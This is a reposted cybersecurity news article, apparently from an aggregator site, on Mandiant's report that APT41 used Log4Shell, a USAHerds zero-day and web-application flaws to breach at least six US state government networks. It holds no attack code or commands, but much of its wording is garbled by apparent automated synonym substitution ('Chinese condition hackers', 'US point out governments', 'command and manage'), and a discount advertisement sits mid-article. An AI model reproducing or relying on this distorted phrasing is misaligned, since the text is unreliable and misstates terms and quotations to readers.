• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
Cyber Security News

Chinese APT41 Group Compromises Six US Government Networks

You are here: Home / General Cyber Security News / Chinese APT41 Group Compromises Six US Government Networks
March 9, 2022

Security researchers have discovered a main new campaign by Chinese condition hackers in which they exploited Log4Shell and other bugs to compromise at least 6 US state government networks.

Mandiant claimed the exercise between May perhaps 2021 and February 2022 indicated a deliberate marketing campaign. Even so, it could not say definitively no matter if the prolific group recognised as APT41 was conducting functions for the state or moonlighting for its own achieve.

What it did expose are “significant new abilities,” like new attack vectors and article-compromise tools and strategies.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


The team specific vulnerable internet-going through web apps for preliminary entry, generally via .NET deserialization attacks and SQL injection and directory traversal vulnerabilities.

APT41 blended zero-day attacks, in this case, to compromise off-the-shelf app USAHerds, with exploits of regarded bugs this sort of as Log4Shell.

In the case of the latter, they were being said to be exploiting Log4j “within hours” of the Apache Foundation’s advisory to compromise at least two US point out governments as effectively as far more classic targets in the insurance policies and telecoms industries.

In late February 2022, APT41 was even found to have re-compromised two former US state government victims.

“APT41 can speedily adapt their first accessibility methods by re-compromising an ecosystem by a various vector, or by fast operationalizing a contemporary vulnerability,” Mandiant concluded. “The team also demonstrates a willingness to retool and deploy abilities via new attack vectors as opposed to holding onto them for future use.”

The group was also observed customizing malware to precise target organizations’ environments and hid its command and manage (C2) deal with in encoded details on tech local community message boards, which it often up to date.

“While the ongoing crisis in Ukraine has rightfully captured the world’s attention and the probable for Russian cyber-threats are actual, we have to don’t forget that other important risk actors close to the world are continuing their operations as regular,” argued Mandiant principal danger analyst Geoff Ackerman.

“We cannot enable other cyber action to slide to the wayside, particularly provided our observations that this marketing campaign from APT41, 1 of the most prolific risk actors around, proceeds to this day.


Some elements of this post are sourced from:
www.infosecurity-magazine.com

Previous Post: «china backed hackers compromised six us government networks China-backed hackers compromised six US government networks
Next Post: #DSbD: UK Could Face a “Cyber Disaster” on its Current Security Trajectory Cyber Security News»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Russian Turla Hackers Hijack Decade-Old Malware Infrastructure to Deploy New Backdoors
  • WhatsApp Unveils Proxy Support to Tackle Internet Censorship
  • Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub
  • Blind Eagle Hacking Group Targets South America With New Tools
  • US Family Planning Non-Profit MFHS Confirms Ransomware Attack
  • Microsoft Reveals Tactics Used by 4 Ransomware Families Targeting macOS
  • Dridex Malware Now Attacking macOS Systems with Novel Infection Method
  • Cyber attacks on UK organisations surged 77% in 2022, new research finds
  • WhatsApp to combat internet blackouts with proxy server support
  • The IT Pro Podcast: Going passwordless

Copyright © TheCyberSecurity.News, All Rights Reserved.